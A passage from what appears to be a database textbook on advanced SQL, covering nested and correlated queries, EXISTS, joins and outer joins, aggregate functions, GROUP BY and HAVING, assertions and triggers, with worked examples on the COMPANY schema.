FROM WORKS_ON
WHERE (Pno, Hours) IN ( SELECT Pno, Hours
                        FROM WORKS_ON
                        WHERE Essn=‘123456789’ );

This query will select the Essns of all employees who work the same (project, hours)
combination on some project that employee ‘John Smith’ (whose Ssn =
‘123456789’) works on. In this example, the IN operator compares the subtuple of
values in parentheses (Pno, Hours) within each tuple in WORKS_ON with the set of
type-compatible tuples produced by the nested query.

In addition to the IN operator, a number of other comparison operators can be used
to compare a single value v (typically an attribute name) to a set or multiset V (typ-
ically a nested query). The = ANY (or = SOME) operator returns TRUE if the value v
is equal to some value in the set V and is hence equivalent to IN. The two keywords
ANY and SOME have the same effect. Other operators that can be combined with
ANY (or SOME) include >, >=, <, <=, and <>. The keyword ALL can also be com-
bined with each of these operators. For example, the comparison condition (v > ALL
V) returns TRUE if the value v is greater than all the values in the set (or multiset) V.
An example is the following query, which returns the names of employees whose
salary is greater than the salary of all the employees in department 5:

SELECT Lname, Fname
FROM EMPLOYEE
WHERE Salary > ALL ( SELECT Salary
                     FROM EMPLOYEE
                     WHERE Dno=5 );


Notice that this query can also be specified using the MAX aggregate function (see
Section 1.7).
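
As a sketch of that alternative (our own reformulation, not a numbered query in the text), the same employees can be retrieved by comparing each salary with the maximum salary in department 5:

SELECT Lname, Fname
FROM EMPLOYEE
WHERE Salary > ( SELECT MAX (Salary)
                 FROM EMPLOYEE
                 WHERE Dno=5 );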

In general, we can have several levels of nested queries. We can once again be faced
with possible ambiguity among attribute names if attributes of the same name
exist—one in a relation in the FROM clause of the outer query, and another in a rela-
tion in the FROM clause of the nested query. The rule is that a reference to an
unqualified attribute refers to the relation declared in the innermost nested query.
For example, in the SELECT clause and WHERE clause of the first nested query of
Q4A, a reference to any unqualified attribute of the PROJECT relation refers to the
PROJECT relation specified in the FROM clause of the nested query. To refer to an
attribute of the PROJECT relation specified in the outer query, we specify and refer
to an alias (tuple variable) for that relation. These rules are similar to scope rules for
program variables in most programming languages that allow nested procedures
and functions. To illustrate the potential ambiguity of attribute names in nested
queries, consider Query 16.

Query 16. Retrieve the name of each employee who has a dependent with the
same first name and is the same sex as the employee.

Q16: SELECT E.Fname, E.Lname
     FROM EMPLOYEE AS E
     WHERE E.Ssn IN ( SELECT Essn
                      FROM DEPENDENT AS D
                      WHERE E.Fname=D.Dependent_name
                            AND E.Sex=D.Sex );

In the nested query of Q16, we must qualify E.Sex because it refers to the Sex attrib-
ute of EMPLOYEE from the outer query, and DEPENDENT also has an attribute
called Sex. If there were any unqualified references to Sex in the nested query, they
would refer to the Sex attribute of DEPENDENT. However, we would not have to
qualify the attributes Fname and Ssn of EMPLOYEE if they appeared in the nested
query because the DEPENDENT relation does not have attributes called Fname and
Ssn, so there is no ambiguity.

It is generally advisable to create tuple variables (aliases) for all the tables referenced
in an SQL query to avoid potential errors and ambiguities, as illustrated in Q16.

1.3 Correlated Nested Queries
Whenever a condition in the WHERE clause of a nested query references some attrib-
ute of a relation declared in the outer query, the two queries are said to be correlated.
We can understand a correlated query better by considering that the nested query is
evaluated once for each tuple (or combination of tuples) in the outer query. For exam-
ple, we can think of Q16 as follows: For each EMPLOYEE tuple, evaluate the nested
query, which retrieves the Essn values for all DEPENDENT tuples with the same sex
and name as that EMPLOYEE tuple; if the Ssn value of the EMPLOYEE tuple is in the
result of the nested query, then select that EMPLOYEE tuple.


In general, a query written with nested select-from-where blocks and using the = or
IN comparison operators can always be expressed as a single block query. For exam-
ple, Q16 may be written as in Q16A:

Q16A: SELECT E.Fname, E.Lname
      FROM EMPLOYEE AS E, DEPENDENT AS D
      WHERE E.Ssn=D.Essn AND E.Sex=D.Sex
            AND E.Fname=D.Dependent_name;

1.4 The EXISTS and UNIQUE Functions in SQL
The EXISTS function in SQL is used to check whether the result of a correlated
nested query is empty (contains no tuples) or not. The result of EXISTS is a Boolean
value TRUE if the nested query result contains at least one tuple, or FALSE if the
nested query result contains no tuples. We illustrate the use of EXISTS—and NOT
EXISTS—with some examples. First, we formulate Query 16 in an alternative form
that uses EXISTS as in Q16B:

Q16B: SELECT E.Fname, E.Lname
      FROM EMPLOYEE AS E
      WHERE EXISTS ( SELECT *
                     FROM DEPENDENT AS D
                     WHERE E.Ssn=D.Essn AND E.Sex=D.Sex
                           AND E.Fname=D.Dependent_name );

EXISTS and NOT EXISTS are typically used in conjunction with a correlated nested
query. In Q16B, the nested query references the Ssn, Fname, and Sex attributes of the
EMPLOYEE relation from the outer query. We can think of Q16B as follows: For each
EMPLOYEE tuple, evaluate the nested query, which retrieves all DEPENDENT tuples
with the same Essn, Sex, and Dependent_name as the EMPLOYEE tuple; if at least one
tuple EXISTS in the result of the nested query, then select that EMPLOYEE tuple. In
general, EXISTS(Q) returns TRUE if there is at least one tuple in the result of the
nested query Q, and it returns FALSE otherwise. On the other hand, NOT EXISTS(Q)
returns TRUE if there are no tuples in the result of nested query Q, and it returns
FALSE otherwise. Next, we illustrate the use of NOT EXISTS.

Query 6. Retrieve the names of employees who have no dependents.

Q6: SELECT Fname, Lname
    FROM EMPLOYEE
    WHERE NOT EXISTS ( SELECT *
                       FROM DEPENDENT
                       WHERE Ssn=Essn );

In Q6, the correlated nested query retrieves all DEPENDENT tuples related to a par-
ticular EMPLOYEE tuple. If none exist, the EMPLOYEE tuple is selected because the
WHERE-clause condition will evaluate to TRUE in this case. We can explain Q6 as
follows: For each EMPLOYEE tuple, the correlated nested query selects all
DEPENDENT tuples whose Essn value matches the EMPLOYEE Ssn; if the result is
empty, no dependents are related to the employee, so we select that EMPLOYEE
tuple and retrieve its Fname and Lname.

Query 7. List the names of managers who have at least one dependent.

Q7: SELECT Fname, Lname
    FROM EMPLOYEE
    WHERE EXISTS ( SELECT *
                   FROM DEPENDENT
                   WHERE Ssn=Essn )
          AND
          EXISTS ( SELECT *
                   FROM DEPARTMENT
                   WHERE Ssn=Mgr_ssn );

One way to write this query is shown in Q7, where we specify two nested correlated
queries; the first selects all DEPENDENT tuples related to an EMPLOYEE, and the sec-
ond selects all DEPARTMENT tuples managed by the EMPLOYEE. If at least one of the
first and at least one of the second exists, we select the EMPLOYEE tuple. Can you
rewrite this query using only a single nested query or no nested queries?

The query Q3: Retrieve the name of each employee who works on all the projects con-
trolled by department number 5 can be written using EXISTS and NOT EXISTS in SQL
systems. We show two ways of specifying this query Q3 in SQL as Q3A and Q3B.
This is an example of certain types of queries that require universal quantification.
One way to write this query is to use the construct (S2 EXCEPT S1) as explained
next, and checking whether the result is empty.1 This option is shown as Q3A.

Q3A: SELECT Fname, Lname
     FROM EMPLOYEE
     WHERE NOT EXISTS ( ( SELECT Pnumber
                          FROM PROJECT
                          WHERE Dnum=5 )
                        EXCEPT
                        ( SELECT Pno
                          FROM WORKS_ON
                          WHERE Ssn=Essn ) );

In Q3A, the first subquery (which is not correlated with the outer query) selects all
projects controlled by department 5, and the second subquery (which is correlated)
selects all projects that the particular employee being considered works on. If the set
difference of the first subquery result MINUS (EXCEPT) the second subquery result is
empty, it means that the employee works on all the projects and is therefore selected.

The second option is shown as Q3B. Notice that we need two-level nesting in Q3B
and that this formulation is quite a bit more complex than Q3A, which uses NOT
EXISTS and EXCEPT.

1Recall that EXCEPT is the set difference operator. The keyword MINUS is also sometimes used, for
example, in Oracle.


Q3B: SELECT Lname, Fname
     FROM EMPLOYEE
     WHERE NOT EXISTS ( SELECT *
                        FROM WORKS_ON B
                        WHERE ( B.Pno IN ( SELECT Pnumber
                                           FROM PROJECT
                                           WHERE Dnum=5 )
                                AND
                                NOT EXISTS ( SELECT *
                                             FROM WORKS_ON C
                                             WHERE C.Essn=Ssn
                                                   AND C.Pno=B.Pno ) ) );

In Q3B, the outer nested query selects any WORKS_ON (B) tuples whose Pno is of a
project controlled by department 5, if there is not a WORKS_ON (C) tuple with the
same Pno and the same Ssn as that of the EMPLOYEE tuple under consideration in
the outer query. If no such tuple exists, we select the EMPLOYEE tuple. The form of
Q3B matches the following rephrasing of Query 3: Select each employee such
that there does not exist a project controlled by department 5 that the employee
does not work on. It corresponds to the way we will write this query in tuple relation
calculus.

There is another SQL function, UNIQUE(Q), which returns TRUE if there are no
duplicate tuples in the result of query Q; otherwise, it returns FALSE. This can be
used to test whether the result of a nested query is a set or a multiset.

1.5 Explicit Sets and Renaming of Attributes in SQL
We have seen several queries with a nested query in the WHERE clause. It is also pos-
sible to use an explicit set of values in the WHERE clause, rather than a nested
query. Such a set is enclosed in parentheses in SQL.

Query 17. Retrieve the Social Security numbers of all employees who work on
project numbers 1, 2, or 3.

Q17: SELECT DISTINCT Essn
FROM WORKS_ON
WHERE Pno IN (1, 2, 3);

In SQL, it is possible to rename any attribute that appears in the result of a query by
adding the qualifier AS followed by the desired new name. Hence, the AS construct
can be used to alias both attribute and relation names, and it can be used in both the
SELECT and FROM clauses. For example, Q8A shows how query Q8 from the chapter
Basic SQL can be slightly changed to retrieve the last name of each employee and his
or her supervisor, while renaming the resulting attribute names as Employee_name and
Supervisor_name. The new names will appear as column headers in the query result.

Q8A: SELECT E.Lname AS Employee_name, S.Lname AS Supervisor_name
FROM EMPLOYEE AS E, EMPLOYEE AS S
WHERE E.Super_ssn=S.Ssn;


1.6 Joined Tables in SQL and Outer Joins
The concept of a joined table (or joined relation) was incorporated into SQL to
permit users to specify a table resulting from a join operation in the FROM clause of
a query. This construct may be easier to comprehend than mixing together all the
select and join conditions in the WHERE clause. For example, consider query Q1,
which retrieves the name and address of every employee who works for the
‘Research’ department. It may be easier to specify the join of the EMPLOYEE and
DEPARTMENT relations first, and then to select the desired tuples and attributes.
This can be written in SQL as in Q1A:

Q1A: SELECT Fname, Lname, Address
FROM (EMPLOYEE JOIN DEPARTMENT ON Dno=Dnumber)
WHERE Dname=‘Research’;

The FROM clause in Q1A contains a single joined table. The attributes of such a table
are all the attributes of the first table, EMPLOYEE, followed by all the attributes of
the second table, DEPARTMENT. The concept of a joined table also allows the user to
specify different types of join, such as NATURAL JOIN and various types of OUTER
JOIN. In a NATURAL JOIN on two relations R and S, no join condition is specified; an
implicit EQUIJOIN condition for each pair of attributes with the same name from R
and S is created. Each such pair of attributes is included only once in the resulting
relation.

If the names of the join attributes are not the same in the base relations, it is possi-
ble to rename the attributes so that they match, and then to apply NATURAL JOIN. In
this case, the AS construct can be used to rename a relation and all its attributes in
the FROM clause. This is illustrated in Q1B, where the DEPARTMENT relation is
renamed as DEPT and its attributes are renamed as Dname, Dno (to match the name
of the desired join attribute Dno in the EMPLOYEE table), Mssn, and Msdate. The
implied join condition for this NATURAL JOIN is EMPLOYEE.Dno=DEPT.Dno,
because this is the only pair of attributes with the same name after renaming:

Q1B: SELECT Fname, Lname, Address
     FROM (EMPLOYEE NATURAL JOIN
           (DEPARTMENT AS DEPT (Dname, Dno, Mssn, Msdate)))
     WHERE Dname=‘Research’;

The default type of join in a joined table is called an inner join, where a tuple is
included in the result only if a matching tuple exists in the other relation. For exam-
ple, in query Q8A, only employees who have a supervisor are included in the result;
an EMPLOYEE tuple whose value for Super_ssn is NULL is excluded. If the user
requires that all employees be included, an OUTER JOIN must be used explicitly (see
Section 6.4.4 for the definition of OUTER JOIN). In SQL, this is handled by explicitly
specifying the keyword OUTER JOIN in a joined table, as illustrated in Q8B:

Q8B: SELECT E.Lname AS Employee_name, S.Lname AS Supervisor_name
     FROM (EMPLOYEE AS E LEFT OUTER JOIN EMPLOYEE AS S
           ON E.Super_ssn=S.Ssn);


There are a variety of outer join operations, not detailed here. In SQL, the options
available for specifying joined tables include INNER JOIN (only pairs of tuples that
match the join condition are retrieved, same as JOIN), LEFT OUTER JOIN (every
tuple in the left table must appear in the result; if it does not have a matching tuple,
it is padded with NULL values for the attributes of the right table), RIGHT OUTER
JOIN (every tuple in the right table must appear in the result; if it does not have a
matching tuple, it is padded with NULL values for the attributes of the left table),
and FULL OUTER JOIN. In the latter three options, the keyword OUTER may be
omitted. If the join attributes have the same name, one can also specify the natural
join variation of outer joins by using the keyword NATURAL before the operation
(for example, NATURAL LEFT OUTER JOIN). The keyword CROSS JOIN is used to
specify the CARTESIAN PRODUCT operation, although this should be used only
with the utmost care because it generates all possible tuple combinations.
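
As a brief sketch of one of these variants (this query is ours, not one of the numbered queries), a FULL OUTER JOIN pairs each employee with the department he or she manages, while also keeping employees who manage no department and any department whose manager has no matching EMPLOYEE tuple; the unmatched side is padded with NULL values:

SELECT E.Lname, D.Dname
FROM (EMPLOYEE AS E FULL OUTER JOIN DEPARTMENT AS D
      ON E.Ssn=D.Mgr_ssn);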

It is also possible to nest join specifications; that is, one of the tables in a join may
itself be a joined table. This allows the specification of the join of three or more
tables as a single joined table, which is called a multiway join. For example, Q2A is a
different way of specifying query Q2 from the chapter Basic SQL using the concept
of a joined table:

Q2A: SELECT Pnumber, Dnum, Lname, Address, Bdate
FROM ((PROJECT JOIN DEPARTMENT ON Dnum=Dnumber)

JOIN EMPLOYEE ON Mgr_ssn=Ssn)
WHERE Plocation=‘Stafford’;

Not all SQL implementations have implemented the newer syntax of joined tables. In
some systems, a different, proprietary syntax is used to specify outer joins by marking
the join condition in the WHERE clause; Oracle, for example, appends the operator (+)
to the column of the table whose tuples are to be padded with NULL values. To specify
the left outer join in Q8B using this Oracle-specific notation, we could write the query
Q8C as follows:

Q8C: SELECT E.Lname, S.Lname
     FROM EMPLOYEE E, EMPLOYEE S
     WHERE E.Super_ssn = S.Ssn (+);

1.7 Aggregate Functions in SQL
Aggregate functions are used to summarize information from multiple tuples into
a single-tuple summary. Grouping is used to create subgroups of tuples before sum-
marization. Grouping and aggregation are required in many database applications,
and we will introduce their use in SQL through examples. A number of built-in
aggregate functions exist: COUNT, SUM, MAX, MIN, and AVG.2 The COUNT function
returns the number of tuples or values as specified in a query. The functions SUM,
MAX, MIN, and AVG can be applied to a set or multiset of numeric values and return,
respectively, the sum, maximum value, minimum value, and average (mean) of
those values. These functions can be used in the SELECT clause or in a HAVING
clause (which we introduce later). The functions MAX and MIN can also be used with
attributes that have nonnumeric domains if the domain values have a total ordering
among one another.3 We illustrate the use of these functions with sample queries.

2Additional aggregate functions for more advanced statistical calculation were added in SQL-99.

Query 19. Find the sum of the salaries of all employees, the maximum salary,
the minimum salary, and the average salary.

Q19: SELECT SUM (Salary), MAX (Salary), MIN (Salary), AVG (Salary)
FROM EMPLOYEE;

If we want to get the preceding function values for employees of a specific depart-
ment—say, the ‘Research’ department—we can write Query 20, where the
EMPLOYEE tuples are restricted by the WHERE clause to those employees who work
for the ‘Research’ department.

Query 20. Find the sum of the salaries of all employees of the ‘Research’
department, as well as the maximum salary, the minimum salary, and the aver-
age salary in this department.

Q20: SELECT SUM (Salary), MAX (Salary), MIN (Salary), AVG (Salary)
FROM (EMPLOYEE JOIN DEPARTMENT ON Dno=Dnumber)
WHERE Dname=‘Research’;

Queries 21 and 22. Retrieve the total number of employees in the company
(Q21) and the number of employees in the ‘Research’ department (Q22).

Q21: SELECT COUNT (*)
FROM EMPLOYEE;

Q22: SELECT COUNT (*)
FROM EMPLOYEE, DEPARTMENT
WHERE Dno=Dnumber AND Dname=‘Research’;

Here the asterisk (*) refers to the rows (tuples), so COUNT (*) returns the number of
rows in the result of the query. We may also use the COUNT function to count values
in a column rather than tuples, as in the next example.

Query 23. Count the number of distinct salary values in the database.

Q23: SELECT COUNT (DISTINCT Salary)
FROM EMPLOYEE;

If we write COUNT (Salary) instead of COUNT (DISTINCT Salary) in Q23, then
duplicate values will not be eliminated. However, any tuples with NULL for Salary
will not be counted. In general, NULL values are discarded when aggregate func-
tions are applied to a particular column (attribute).

3Total order means that for any two values in the domain, it can be determined that one appears before
the other in the defined order; for example, DATE, TIME, and TIMESTAMP domains have total orderings
on their values, as do alphabetic strings.

The preceding examples summarize a whole relation (Q19, Q21, Q23) or a selected
subset of tuples (Q20, Q22), and hence all produce single tuples or single values.
They illustrate how functions are applied to retrieve a summary value or summary
tuple from the database. These functions can also be used in selection conditions
involving nested queries. We can specify a correlated nested query with an aggregate
function, and then use the nested query in the WHERE clause of an outer query. For
example, to retrieve the names of all employees who have two or more dependents
(Query 5), we can write the following:

Q5: SELECT Lname, Fname
    FROM EMPLOYEE
    WHERE ( SELECT COUNT (*)
            FROM DEPENDENT
            WHERE Ssn=Essn ) >= 2;

The correlated nested query counts the number of dependents that each employee
has; if this is greater than or equal to two, the employee tuple is selected.

1.8 Grouping: The GROUP BY and HAVING Clauses
In many cases we want to apply the aggregate functions to subgroups of tuples in a
relation, where the subgroups are based on some attribute values. For example, we
may want to find the average salary of employees in each department or the number
of employees who work on each project. In these cases we need to partition the rela-
tion into nonoverlapping subsets (or groups) of tuples. Each group (partition) will
consist of the tuples that have the same value of some attribute(s), called the
grouping attribute(s). We can then apply the function to each such group inde-
pendently to produce summary information about each group. SQL has a GROUP
BY clause for this purpose. The GROUP BY clause specifies the grouping attributes,
which should also appear in the SELECT clause, so that the value resulting from
applying each aggregate function to a group of tuples appears along with the value
of the grouping attribute(s).

Query 24. For each department, retrieve the department number, the number
of employees in the department, and their average salary.

Q24: SELECT Dno, COUNT (*), AVG (Salary)
FROM EMPLOYEE
GROUP BY Dno;

In Q24, the EMPLOYEE tuples are partitioned into groups—each group having
the same value for the grouping attribute Dno. Hence, each group contains the
employees who work in the same department. The COUNT and AVG functions are
applied to each such group of tuples. Notice that the SELECT clause includes only the
grouping attribute and the aggregate functions to be applied on each group of tuples.
Figure 1(a) illustrates how grouping works on Q24; it also shows the result of Q24.


Figure 1
Results of GROUP BY and HAVING. (a) Grouping the EMPLOYEE tuples by the value of Dno for Q24. (b) The groups formed for Q26 after applying the WHERE clause but before applying HAVING, and after applying the HAVING clause condition; the ProductX and ProductZ groups, with only two employees each, are not selected by the HAVING condition of Q26.

Result of Q24
Dno Count(*) Avg(Salary)
5 4 33250
4 3 31000
1 1 55000

Result of Q26
Pname Count(*)
ProductY 3
Computerization 3
Reorganization 3
Newbenefits 3


If NULLs exist in the grouping attribute, then a separate group is created for all
tuples with a NULL value in the grouping attribute. For example, if the EMPLOYEE
table had some tuples that had NULL for the grouping attribute Dno, there would be
a separate group for those tuples in the result of Q24.
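
As a small sketch of this behavior (not a numbered query in the text), grouping the EMPLOYEE tuples by Super_ssn places the employee whose Super_ssn is NULL in Figure A.3 in a group of its own:

SELECT Super_ssn, COUNT (*)
FROM EMPLOYEE
GROUP BY Super_ssn;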

Query 25. For each project, retrieve the project number, the project name, and
the number of employees who work on that project.

Q25: SELECT Pnumber, Pname, COUNT (*)
FROM PROJECT, WORKS_ON
WHERE Pnumber=Pno
GROUP BY Pnumber, Pname;

Q25 shows how we can use a join condition in conjunction with GROUP BY. In this
case, the grouping and functions are applied after the joining of the two relations.
Sometimes we want to retrieve the values of these functions only for groups that sat-
isfy certain conditions. For example, suppose that we want to modify Query 25 so
that only projects with more than two employees appear in the result. SQL provides
a HAVING clause, which can appear in conjunction with a GROUP BY clause, for this
purpose. HAVING provides a condition on the summary information regarding the
group of tuples associated with each value of the grouping attributes. Only the
groups that satisfy the condition are retrieved in the result of the query. This is illus-
trated by Query 26.

Query 26. For each project on which more than two employees work, retrieve
the project number, the project name, and the number of employees who work
on the project.

Q26: SELECT Pnumber, Pname, COUNT (*)
FROM PROJECT, WORKS_ON
WHERE Pnumber=Pno
GROUP BY Pnumber, Pname
HAVING COUNT (*) > 2;

Notice that while selection conditions in the WHERE clause limit the tuples to which
functions are applied, the HAVING clause serves to choose whole groups. Figure 1(b)
illustrates the use of HAVING and displays the result of Q26.

Query 27. For each project, retrieve the project number, the project name, and
the number of employees from department 5 who work on the project.

Q27: SELECT Pnumber, Pname, COUNT (*)
FROM PROJECT, WORKS_ON, EMPLOYEE
WHERE Pnumber=Pno AND Ssn=Essn AND Dno=5
GROUP BY Pnumber, Pname;

Here we restrict the tuples in the relation (and hence the tuples in each group) to
those that satisfy the condition specified in the WHERE clause—namely, that they
work in department number 5. Notice that we must be extra careful when two dif-
ferent conditions apply (one to the aggregate function in the SELECT clause and
another to the function in the HAVING clause). For example, suppose that we want
to count the total number of employees whose salaries exceed $40,000 in each
department, but only for departments where more than five employees work. Here,
the condition (SALARY > 40000) applies only to the COUNT function in the SELECT
clause. Suppose that we write the following incorrect query:

SELECT Dname, COUNT (*)
FROM DEPARTMENT, EMPLOYEE
WHERE Dnumber=Dno AND Salary>40000
GROUP BY Dname
HAVING COUNT (*) > 5;

This is incorrect because it will select only departments that have more than five
employees who each earn more than $40,000. The rule is that the WHERE clause is
executed first, to select individual tuples or joined tuples; the HAVING clause is
applied later, to select individual groups of tuples. Hence, the tuples are already
restricted to employees who earn more than $40,000 before the function in the
HAVING clause is applied. One way to write this query correctly is to use a nested
query, as shown in Query 28.

Query 28. For each department that has more than five employees, retrieve
the department number and the number of its employees who are making
more than $40,000.

Q28: SELECT Dnumber, COUNT (*)
     FROM DEPARTMENT, EMPLOYEE
     WHERE Dnumber=Dno AND Salary>40000 AND Dno IN
           ( SELECT Dno
             FROM EMPLOYEE
             GROUP BY Dno
             HAVING COUNT (*) > 5 )
     GROUP BY Dnumber;

1.9 Discussion and Summary of SQL Queries
A retrieval query in SQL can consist of up to six clauses, but only the first two—
SELECT and FROM—are mandatory. The query can span several lines, and is ended
by a semicolon. Query terms are separated by spaces, and parentheses can be used to
group relevant parts of a query in the standard way. The clauses are specified in the
following order, with the clauses between square brackets [ … ] being optional:

SELECT <attribute and function list>
FROM <table list>
[ WHERE <condition> ]
[ GROUP BY <grouping attribute(s)> ]
[ HAVING <group condition> ]
[ ORDER BY <attribute list> ];

The SELECT clause lists the attributes or functions to be retrieved. The FROM clause
specifies all relations (tables) needed in the query, including joined relations, but
not those in nested queries. The WHERE clause specifies the conditions for selecting
the tuples from these relations, including join conditions if needed. GROUP BY
specifies grouping attributes, whereas HAVING specifies a condition on the groups
being selected rather than on the individual tuples. The built-in aggregate functions
COUNT, SUM, MIN, MAX, and AVG are used in conjunction with grouping, but they
can also be applied to all the selected tuples in a query without a GROUP BY clause.
Finally, ORDER BY specifies an order for displaying the result of a query.
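
As a sketch that exercises all six clauses at once (our own example, not a numbered query), the following retrieves, for each department in which more than two employees earn over $20,000, the department number and the average salary of those employees, listed in decreasing order of that average:

SELECT Dno, AVG (Salary) AS Avg_sal
FROM EMPLOYEE
WHERE Salary > 20000
GROUP BY Dno
HAVING COUNT (*) > 2
ORDER BY Avg_sal DESC;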

In order to formulate queries correctly, it is useful to consider the steps that define
the meaning or semantics of each query. A query is evaluated conceptually4 by first
applying the FROM clause (to identify all tables involved in the query or to material-
ize any joined tables), followed by the WHERE clause to select and join tuples, and
then by GROUP BY and HAVING. Conceptually, ORDER BY is applied at the end to
sort the query result. If none of the last three clauses (GROUP BY, HAVING, and
ORDER BY) are specified, we can think conceptually of a query as being executed as
follows: For each combination of tuples—one from each of the relations specified in
the FROM clause—evaluate the WHERE clause; if it evaluates to TRUE, place the val-
ues of the attributes specified in the SELECT clause from this tuple combination in
the result of the query. Of course, this is not an efficient way to implement the query
in a real system, and each DBMS has special query optimization routines to decide
on an execution plan that is efficient to execute.

In general, there are numerous ways to specify the same query in SQL. This flexibil-
ity in specifying queries has advantages and disadvantages. The main advantage is
that users can choose the technique with which they are most comfortable when
specifying a query. For example, many queries may be specified with join conditions
in the WHERE clause, or by using joined relations in the FROM clause, or with some
form of nested queries and the IN comparison operator. Some users may be more
comfortable with one approach, whereas others may be more comfortable with
another. From the programmer’s and the system’s point of view regarding query
optimization, it is generally preferable to write a query with as little nesting and
implied ordering as possible.

The disadvantage of having numerous ways of specifying the same query is that this
may confuse the user, who may not know which technique to use to specify particu-
lar types of queries. Another problem is that it may be more efficient to execute a
query specified in one way than the same query specified in an alternative way.
Ideally, this should not be the case: The DBMS should process the same query in the
same way regardless of how the query is specified. But this is quite difficult in prac-
tice, since each DBMS has different methods for processing queries specified in dif-
ferent ways. Thus, an additional burden on the user is to determine which of the
alternative specifications is the most efficient to execute. Ideally, the user should
worry only about specifying the query correctly, whereas the DBMS would deter-
mine how to execute the query efficiently. In practice, however, it helps if the user is
aware of which types of constructs in a query are more expensive to process than
others.

4The actual order of query evaluation is implementation dependent; this is just a way to conceptually view
a query in order to correctly formulate it.


2 Specifying Constraints as Assertions
and Actions as Triggers

In this section, we introduce two additional features of SQL: the CREATE ASSER-
TION statement and the CREATE TRIGGER statement. Section 2.1 discusses CREATE
ASSERTION, which can be used to specify additional types of constraints that are
outside the scope of the built-in relational model constraints (primary and unique
keys, entity integrity, and referential integrity). These built-in constraints can be
specified within the CREATE TABLE statement of SQL.

Then in Section 2.2 we introduce CREATE TRIGGER, which can be used to specify
automatic actions that the database system will perform when certain events and
conditions occur. This type of functionality is generally referred to as active data-
bases. We only introduce the basics of triggers in this chapter.

2.1 Specifying General Constraints as Assertions in SQL
In SQL, users can specify general constraints via declarative assertions, using the
CREATE ASSERTION statement of the DDL. Each assertion is given a constraint
name and is specified via a condition similar to the WHERE clause of an SQL query.
For example, to specify the constraint that the salary of an employee must not be
greater than the salary of the manager of the department that the employee works for in
SQL, we can write the following assertion:

CREATE ASSERTION SALARY_CONSTRAINT
CHECK ( NOT EXISTS ( SELECT *
                     FROM EMPLOYEE E, EMPLOYEE M, DEPARTMENT D
                     WHERE E.Salary>M.Salary
                           AND E.Dno=D.Dnumber
                           AND D.Mgr_ssn=M.Ssn ) );

The constraint name SALARY_CONSTRAINT is followed by the keyword CHECK,
which is followed by a condition in parentheses that must hold true on every data-
base state for the assertion to be satisfied. The constraint name can be used later to
refer to the constraint or to modify or drop it. The DBMS is responsible for ensur-
ing that the condition is not violated. Any WHERE clause condition can be used, but
many constraints can be specified using the EXISTS and NOT EXISTS style of SQL
conditions. Whenever some tuples in the database cause the condition of an
ASSERTION statement to evaluate to FALSE, the constraint is violated. The con-
straint is satisfied by a database state if no combination of tuples in that database
state violates the constraint.

The basic technique for writing such assertions is to specify a query that selects any
tuples that violate the desired condition. By including this query inside a NOT EXISTS
clause, the assertion will specify that the result of this query must be empty so that
the condition will always be TRUE. Thus, the assertion is violated if the result of the
query is not empty. In the preceding example, the query selects all employees whose
salaries are greater than the salary of the manager of their department. If the result
of the query is not empty, the assertion is violated.
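
As another sketch that follows the same pattern (the 56-hour limit is our own illustration, not a stated COMPANY requirement), an assertion could enforce that no employee is assigned more than 56 total hours per week across all projects:

CREATE ASSERTION MAX_HOURS_CONSTRAINT
CHECK ( NOT EXISTS ( SELECT Essn
                     FROM WORKS_ON
                     GROUP BY Essn
                     HAVING SUM (Hours) > 56 ) );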

Note that the CHECK clause and constraint condition can also be used to specify
constraints on individual attributes and domains and on individual tuples. A major
difference between CREATE ASSERTION and the individual domain constraints and
tuple constraints is that the CHECK clauses on individual attributes, domains, and
tuples are checked in SQL only when tuples are inserted or updated. Hence, con-
straint checking can be implemented more efficiently by the DBMS in these cases.
The schema designer should use CHECK on attributes, domains, and tuples only
when he or she is sure that the constraint can only be violated by insertion or updat-
ing of tuples. On the other hand, the schema designer should use CREATE ASSER-
TION only in cases where it is not possible to use CHECK on attributes, domains, or
tuples, so that simple checks are implemented more efficiently by the DBMS.
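
For comparison, here is a minimal sketch of a tuple-based CHECK inside a CREATE TABLE statement (the SALARY_SCALE table is hypothetical and is introduced only for illustration):

CREATE TABLE SALARY_SCALE
( Grade       INT NOT NULL,
  Min_salary  DECIMAL(10,2),
  Max_salary  DECIMAL(10,2),
  CHECK (Min_salary <= Max_salary) );

Because the condition mentions only attributes of a single tuple, the DBMS needs to verify it only when a SALARY_SCALE row is inserted or updated, which is exactly the situation in which CHECK is preferable to a general assertion.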

2.2 Introduction to Triggers in SQL
Another important statement in SQL is CREATE TRIGGER. In many cases it is con-
venient to specify the type of action to be taken when certain events occur and when
certain conditions are satisfied. For example, it may be useful to specify a condition
that, if violated, causes some user to be informed of the violation. A manager may
want to be informed if an employee’s travel expenses exceed a certain limit by
receiving a message whenever this occurs. The action that the DBMS must take in
this case is to send an appropriate message to that user. The condition is thus used to
monitor the database. Other actions may be specified, such as executing a specific
stored procedure or triggering other updates. The CREATE TRIGGER statement is
used to implement such actions in SQL. Here we just give a simple example of how
triggers may be used.

Suppose we want to check whenever an employee’s salary is greater than the salary
of his or her direct supervisor in the COMPANY database (see Figures A.1 and A.2 in
Appendix: Figures at the end of the chapter). Several events can trigger this rule:
inserting a new employee record, changing an employee’s salary, or changing an
employee’s supervisor. Suppose that the action to take would be to call an external
stored procedure INFORM_SUPERVISOR,5 which will notify the supervisor. The trigger
could then be written as in R5 below. Here we are using the syntax of the Oracle
database system.

R5: CREATE TRIGGER SALARY_VIOLATION
    BEFORE INSERT OR UPDATE OF Salary, Super_ssn ON EMPLOYEE
    FOR EACH ROW
    WHEN ( NEW.Salary > ( SELECT Salary
                          FROM EMPLOYEE
                          WHERE Ssn = NEW.Super_ssn ) )
    INFORM_SUPERVISOR(NEW.Super_ssn, NEW.Ssn);

5Assuming that an appropriate external procedure has been declared.

The trigger is given the name SALARY_VIOLATION, which can be used to remove or
deactivate the trigger later. A typical trigger has three components:

1. The event(s): These are usually database update operations that are explicitly
applied to the database. In this example the events are: inserting a new
employee record, changing an employee’s salary, or changing an employee’s
supervisor. The person who writes the trigger must make sure that all possi-
ble events are accounted for. In some cases, it may be necessary to write more
than one trigger to cover all possible cases. These events are specified after
the keyword BEFORE in our example, which means that the trigger should
be executed before the triggering operation is executed. An alternative is to
use the keyword AFTER, which specifies that the trigger should be executed
after the operation specified in the event is completed.

2. The condition that determines whether the rule action should be executed:
Once the triggering event has occurred, an optional condition may be evalu-
ated. If no condition is specified, the action will be executed once the event
occurs. If a condition is specified, it is first evaluated, and only if it evaluates
to true will the rule action be executed. The condition is specified in the
WHEN clause of the trigger.

3. The action to be taken: The action is usually a sequence of SQL statements,
but it could also be a database transaction or an external program that will
be automatically executed. In this example, the action is to execute the stored
procedure INFORM_SUPERVISOR.

